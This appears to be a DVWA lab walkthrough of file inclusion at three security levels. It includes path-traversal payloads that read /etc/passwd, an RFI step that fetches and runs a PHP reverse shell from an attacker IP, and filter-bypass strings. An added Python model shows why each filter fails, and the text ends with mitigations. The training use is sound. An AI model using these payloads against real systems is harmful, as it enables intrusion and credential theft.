DVWA - File Inclusion (Low/Med/High)

In this walkthrough we will go through the File Inclusion section of DVWA. We will explore File Inclusion attacks and what makes an application vulnerable to them. We will start with the security level set to Low and gradually increase the difficulty as we progress. So, let's get started with the hacking without any delay.

File Inclusion

File Inclusion Attacks:

A File Inclusion attack occurs when an attacker is able to control which file an application includes, usually by abusing a "dynamic file inclusion" mechanism such as PHP's include() taking a filename from a request parameter. The vulnerability arises from using user-supplied input without proper validation. At minimum the attacker can read sensitive files on the target server; depending on the configuration it can lead to code execution. There are two types of File Inclusion vulnerabilities:

  • Local File Inclusion (LFI) – the attacker includes and reads local files on the target server or machine.
  • Remote File Inclusion (RFI) – the attacker includes a file hosted on a remote server they control. Because the included file is executed as PHP, this typically leads to Remote Code Execution on the target. In PHP it requires allow_url_include to be enabled.

Security: Low (File Inclusion)

  • Set the security level to Low with PHPIDS enabled.

Security level Low

  • The challenge page links to three files (file1.php to file3.php), each of them loaded through the page parameter, so all three requests are candidates for file inclusion.

File inclusion

  • I started with the first file and then the next two, checking whether the page parameter is vulnerable to LFI with some common traversal payloads; each request was flagged by PHPIDS.

http://localhost/vulnerabilities/fi/?page=../../../../etc/passwd

http://localhost/vulnerabilities/fi/?page=../../../../etc/passwd%00

http://localhost/vulnerabilities/fi/?page=../../../../../../etc/passwd

PHPIDS flagged

  • The source (low.php) is as simple as it gets: it reads the GET parameter page and passes it straight to include() with no validation at all.

low.php

  • I disabled PHPIDS and tried the payload below to read the contents of /etc/passwd, and it worked.

Security level low

../../../../../../etc/passwd

../.../.../.../etc/passwd

/etc/passwd file

  • I manually incremented the file number to 4 and found a hidden page, file4.php, which is not linked from the challenge.

http://localhost/vulnerabilities/fi/?page=file4.php

file4.php

File Inclusion

  • Let's check the application for RFI. I tested with Google's URL and it worked: the Google page was rendered inside DVWA, which means include() is fetching remote URLs (allow_url_include is enabled in this PHP configuration).

http://localhost/vulnerabilities/fi/?page=http://google.com

checking for RFI

Google search

  • Next, let's generate a PHP reverse shell payload and host it on our own server. We will then use the vulnerable endpoint to fetch and execute it on the target, which gives us a reverse connection back to our machine. I used the PHP reverse shell from Pentest Monkey and changed the IP address (and, if needed, the listening port) inside it.

Changing the IP address

  • Host the payload on our server. Any plain static file server will do; in fact it must not execute PHP itself, otherwise the shell would run on our box instead of the target. Python's built-in module serves the file as-is on port 8000.

python3 -m http.server

python http server

  • Pointing the page parameter at the hosted shell makes the target fetch and execute it, which gives us remote access to the server as soon as the netcat listener receives the connection.

http://localhost/vulnerabilities/fi/?page=http://192.168.29.81:8000/shell.php

shell.php

netcat listener

Security: Medium (File Inclusion)

  • Set the security level to Medium with PHPIDS enabled.

  • Looking at the source for this level (medium.php), the application runs str_replace() on the page parameter to strip the strings "http://" and "https://" and then "../" and "..\", replacing each with an empty string. The replacement is a single pass and the result is never re-checked, so a string that carries one of these tokens nested inside itself reassembles after the strip.

medium.php

  • I first tried to bypass it by URL-encoding the malicious file path.

URL Encoder: https://urlencoder.io

URL encode online

  • It didn't work, and double encoding didn't work either. PHP decodes the query string once before medium.php runs, so a single-encoded http%3A%2F%2F arrives as the literal http:// and is stripped, while a double-encoded value survives the filter as http%3A%2F%2F, which include() does not recognise as a URL.

  • After disabling PHPIDS and sending the payload below, I got the reverse connection back. Every "http://" token is removed in one pass, and the characters left between them spell out http:// again, so include() receives the original remote URL.

Security level medium

hhttp://thttp://thttp://phttp://:http://http:///http:///192.168.29.81:8000/shell.php

shell.php payload

netcat listener

  • I tried various payloads but was unable to bypass the PHPIDS.

PHPIDS flagged

Security: High (File Inclusion)

  • Set the security level to High with PHPIDS enabled.

Security level high

  • The source for this level (high.php) is stricter: the page parameter is checked with fnmatch("file*", $file) and must either match that pattern or be exactly include.php, otherwise the request is rejected with an error. A URL beginning with http:// fails the pattern, so RFI does not work here.

high.php

  • The check only looks at the prefix, so the file:// stream wrapper still satisfies it and can be used to read local files. fnmatch() is case-sensitive by default, so the wrapper has to be written in lowercase. Combined with a file-upload vulnerability, the same trick lets an attacker include an uploaded PHP file and get code execution. This worked only with PHPIDS disabled.

http://localhost/vulnerabilities/fi/?page=file:////etc/passwd

/etc/passwd
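To make the difference between the three levels concrete, here is an added Python model of the Medium filter and the High check described above. It is not DVWA's own code (which is PHP): PHP's str_replace() and fnmatch() are modelled with Python's str.replace() and fnmatch.fnmatchcase(), which have the same single-pass, case-sensitive behaviour. The payload strings marked "constructed" and the exact-match allowlist in hardened_allows() are my assumptions; the long Medium payload, the file:// wrapper and the attacker IP 192.168.29.81 come from the page.

```python
import fnmatch
from typing import Iterable

# Payloads from the walkthrough plus two constructed variants. Only
# MEDIUM_RFI_PAYLOAD and HIGH_WRAPPER appear on the page as written.
MEDIUM_RFI_PAYLOAD = ("hhttp://thttp://thttp://phttp://:http://http:///http:///"
                      "192.168.29.81:8000/shell.php")
MEDIUM_RFI_SHORT = "hthttp://tp://192.168.29.81:8000/shell.php"   # constructed: minimal form
MEDIUM_LFI_BYPASS = "....//....//....//etc/passwd"                # constructed: rebuilds ../
HIGH_WRAPPER = "file:///etc/passwd"                               # page's bypass of fnmatch()


def php_str_replace(search: Iterable[str], subject: str) -> str:
    """Model PHP str_replace(array(...), "", $subject): one left-to-right,
    non-overlapping pass per pattern and no re-scan of the result."""
    for token in search:
        subject = subject.replace(token, "")
    return subject


def low_filter(page: str) -> str:
    """low.php: $file = $_GET['page']; -- nothing is checked or stripped."""
    return page


def medium_filter(page: str) -> str:
    """medium.php: strip remote wrappers, then traversal sequences, one pass each."""
    page = php_str_replace(["http://", "https://"], page)
    page = php_str_replace(["../", "..\\"], page)
    return page


def high_allows(page: str) -> bool:
    """high.php: reject unless fnmatch("file*", $file) or $file == "include.php".
    fnmatchcase() mirrors PHP's default case-sensitive fnmatch()."""
    return fnmatch.fnmatchcase(page, "file*") or page == "include.php"


# Hardened variant (assumption, not DVWA code): exact-match allowlist of the
# pages the application really ships, so wrappers and traversal never reach
# include(). Pair it with allow_url_include=Off in php.ini.
ALLOWED_PAGES = frozenset({"include.php", "file1.php", "file2.php", "file3.php"})


def hardened_allows(page: str) -> bool:
    return page in ALLOWED_PAGES


def evaluate(page: str) -> dict:
    """What each level would hand to include(); None means the request is rejected."""
    return {
        "low": low_filter(page),
        "medium": medium_filter(page),
        "high": page if high_allows(page) else None,
        "hardened": page if hardened_allows(page) else None,
    }


if __name__ == "__main__":
    samples = [
        "../../../../../../etc/passwd",
        "http://192.168.29.81:8000/shell.php",
        MEDIUM_RFI_PAYLOAD,
        MEDIUM_RFI_SHORT,
        MEDIUM_LFI_BYPASS,
        HIGH_WRAPPER,
        "file1.php",
    ]
    for sample in samples:
        print(sample)
        for level, result in evaluate(sample).items():
            print(f"  {level:>8}: {'BLOCKED' if result is None else result}")
```

Running it shows the Medium filter turning the page's long payload (and the shorter constructed one) back into http://192.168.29.81:8000/shell.php, the constructed ....// form surviving as ../../../etc/passwd, and file:///etc/passwd passing the High check but failing the exact-match allowlist.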

Conclusion:

So, we have completed all three security levels of the DVWA File Inclusion vulnerability. We looked at how the application is configured at each level and how the controls can be bypassed. To mitigate File Inclusion, set allow_url_include (and ideally allow_url_fopen) to Off in php.ini, which removes RFI, and validate the page parameter against a fixed allowlist of exact filenames rather than stripping bad substrings or matching a prefix, which removes LFI and the file:// wrapper trick as well. On that note, I will take your leave and will meet you in the next one with another DVWA vulnerability writeup, till then "Keep Hacking".
